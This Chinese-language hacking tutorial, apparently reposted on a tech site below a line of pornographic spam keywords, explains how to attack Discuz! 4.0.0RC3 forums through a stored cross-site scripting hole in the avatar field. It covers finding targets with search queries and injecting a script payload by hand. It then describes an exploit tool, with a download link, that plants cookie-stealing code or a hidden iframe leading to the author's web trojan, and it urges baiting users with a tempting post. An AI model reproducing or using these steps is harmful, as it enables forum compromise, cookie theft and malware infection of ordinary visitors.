中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

黑客入侵實例 記對Discuz論壇的入侵

2017-11-30    來源:

容器云強勢上線!快速搭建集群,上萬Linux鏡像隨意使用

  文/小地瓜

  最近閑來無事的菜鳥們,掀起了一場Discuz論壇,入侵狂潮的“運動”。一時間鬧整個安全界也是沸騰不已。不過各站點的站長們身手還算敏捷,低版本Discuz論壇還沒用多久,便換上了高版本的論壇(Discuz!4 dot 0.0RC3版本)進行彌補漏洞。但是經過筆者測試成功,得出高級版本的Discuz程序,也是含有跨站入侵的漏洞。只是在方法有些差別而已。下文便是筆者這段時間入侵研究的心得,何不一同來領略一下入侵帶來的“快感”!

  一、望穿秋水的“手動”入侵法

  1.首先進入GOOGLE或者百度的搜索站點,在關鍵字處輸入Powered by Discuz! 4.0.0RC3,然后單擊 “目標”按鈕進入。便可查找出眾多使用此版本的論壇地址,這里筆者隨意挑選了一個游戲公司的站點作例題講解。進入游戲公司站點后,單擊右上角 “注冊”標簽,彈出會員用戶的注意事項,并且需要等待論壇所設置的閱讀時間,然后“單擊”下方同意按鈕,在注冊用戶的必填處,填入自己的相關信息,最后單擊“提交”按鈕,即可成功注冊。

2.會員注冊成功以后,自動跳轉到論壇首頁。在依次進入“控制面板”→“編輯個人資料”。打開“編輯個人資料”標簽,單擊下方“論壇頭像列表”按鈕(如圖1),會顯示出論壇頭像中的所有圖片。這里筆者隨意選擇了一個預設的頭像圖片,并將其頁面保存到本地機器中。

黑客入侵實例記對Discuz論壇的入侵
圖1論壇列表

  3.在轉到本地機器,以記事本形式打開保存的頁面,并單擊上方“編輯”標簽,選擇“查找”選項,彈出查找對話框。在查找文本處輸入 “<FORM action=”的字符內容,然后單擊目標處“查找下一個”按鈕,會在記事本內容下方,選擇到所要查找的目標(如圖2)。隨后在等號后面填入WWW. GU**Y.COM.CN\,來補全提交頁面的網址路徑。在將其修改過的頁面保存,然后在重新打開該頁面,并單擊 “提交”按鈕。這時再回到網站的“控制面板首頁”標簽欄,查看一下頭像是否提交成功。

黑客入侵實例記對Discuz論壇的入侵
圖 2 代碼

  小提示:因保存到本地的頭像頁面,采用的提交地址是相對路徑,所以這里需要補全該站點的網址。否則在提交頁面的同時,會顯示找不到路徑的404錯誤。如果已經填補了網址路徑,并且在本地也成功的將頭像提交給了該網站,大家就可以大膽的說明此網站存在頭像跨站的漏洞,接下來就可以進行跨站入侵了。

  4.提交頭像成功以后,使用DreamWeaver網頁設計軟件將本地提交的頁面打開,然后單擊頭像一的Radio空間,把選定址處改為“images/avatars/02.gif"><script>alert("曲靖提醒:貴站含有頭像跨站漏洞,請采取相關的防御措施!")</script>”的代碼字符。在單擊“文件”菜單,選擇“保存”選項,即可將修改的控件,成功保存。然后在雙擊打開該頁面,選擇頭像一的單選框,并單擊下方“提交”按鈕。程序回顯會提示:修改成功!同時刷新此頁面,彈出筆者所建立的警告對話框(如圖3),最后在找個熱門的帖子回復一下,只要當用戶打開含有筆者的帖子時,都會彈出如圖3的警告對話框!

黑客入侵實例記對Discuz論壇的入侵
圖3 報錯

  小提示:在 “控制面板首頁”標簽處,查看一下網頁代碼。只要大家稍有留意,便不難發(fā)現(xiàn)調用<img src="www.gu**y.com.cn/images/avatars/02.gif" width="83" height="94" border="0">的圖片地址。調用代碼是<img src=“$avatars”字符,所以我們可以構造一個Radio的控件值,來修改的選定值。需要用到DreamWeaver網頁設計軟件,或其他的網頁制作軟件來修改,才能自動轉義其格式。而不要使用記事本的形式修改相關數(shù)值,否則會導致整體內容錯亂。

二、工欲善其事必先利其器

  也許繁瑣的手工入侵法,不太適合菜鳥使用。不過沒有關系,筆者又為眾菜鳥們量身定做了,一套“傻瓜式”入侵套餐。此套餐的宗旨就是讓有無基礎的菜鳥朋友,都可以按著下文介紹的方法,來入侵高級版本的Discuz論壇。

  前提條件:首先下載Discuz!4.0.0RC3漏洞利用工具(下載地址:http://blog.blackwoods.cn/up/DiscuzExploit.exe),這里下載速度較慢的朋友,不要發(fā)愁。該軟件已收錄到本期配套光盤中,還請讀者朋友注意查收一下!

  步驟1.雙擊下載到桌面的“漏洞利用工具”圖標,彈出程序界面(如圖4),然后在第二步的文本內容處,敲入手動跨站成功的地址(www. gu**y.com.cn/)。操作完畢后,單擊下方“讀取參數(shù)”按鈕,這時需稍等片刻后,才會出現(xiàn)讀取成功的對話框(如圖5),并單擊“確定”按鈕即可。

黑客入侵實例記對Discuz論壇的入侵(2)
圖4漏洞利用工具

黑客入侵實例記對Discuz論壇的入侵(2)
圖5讀取參數(shù)

  小提示:本文手動入侵和工具入侵,都是采用同一個站點做列題講解。所以在工具入侵中,有關軟件界面提示,第一步需注冊站點用戶,這里已經在手動入侵中注冊完畢,并且已經保存了COOKIES登陸,因此筆者為了避免重復講解,跳躍了過去。如果您在漏洞站點中,還沒有注冊過用戶的朋友,請先去注冊用戶,然后在執(zhí)行步驟1中的方法。

步驟2.在第三步跨站內容處輸入所要插入的惡意代碼,如果此時你對代碼知識一無所知,可以參考左邊代碼助手,標簽中的三個按鈕(如圖6)。這里筆者單擊“插入IFrame”按鈕,會在所需的跨站內容處,出現(xiàn)<iframe src='' width=0 height=0></iframe>的字符代碼。然后在<iframe src的等于后面,填入www.fa***d.com\fda.asp的網址,這是筆者事先制作好的網頁后門地址。

黑客入侵實例記對Discuz論壇的入侵(3)
圖6代碼助手

  小提示:代碼助手中,“彈出對話框”按鈕、“讀取COOKIES”按鈕以及插入“IFrame”按鈕,分別代表當用戶瀏覽過含有自己帖子的同時,1.會彈出如圖3的警告對話框。2.得到瀏覽用戶的COOKIES信息。3.在機器中加載網站木馬的相關信息。

  步驟3.輸入完畢后,其他設置保持默認,然后單擊“提交”按鈕。執(zhí)行進度框內,會呈現(xiàn)出寫入站點代碼的整個過程(如圖7)。但是成功與否還需要看見后面的成功提示,方可判斷本次寫入是否成功,這里筆者等待十秒鐘后,彈出了成功的“結論”(如圖8)。既然惡意地址寫入成功,在漏洞論壇取個誘惑力,較強的標題名稱發(fā)表,從而讓瀏覽過此帖的用戶,都能重上筆者所建立的網頁木馬。

黑客入侵實例記對Discuz論壇的入侵(3)
圖7執(zhí)行進度

黑客入侵實例記對Discuz論壇的入侵(3)
圖8應用程序

  三、總結

  Discuz!4 dot 0.0RC3版本的頭像跨站漏洞,雖然不會危機到整個論壇的安全性能,但是它會牽扯到論壇所用戶的電腦安危。小則導致重要信息被竊取,大則電腦搖身變肉雞!

  注意:本文所介紹的內容,只是告訴大家這種技術,任何人不得利用此技術做非法的事情。

標簽: Google 安全 代碼 漏洞 搜索 網站 選擇 用戶

版權申明:本站文章部分自網絡,如有侵權,請聯(lián)系:west999com@outlook.com
特別注意:本站所有轉載文章言論不代表本站觀點!
本站所提供的圖片等素材,版權歸原作者所有,如需使用,請與原作者聯(lián)系。

上一篇:小規(guī)模DDoS用Freebsd+IPFW搞定

下一篇:ARP欺騙解決終極辦法(傳說中的虛擬網關)詳解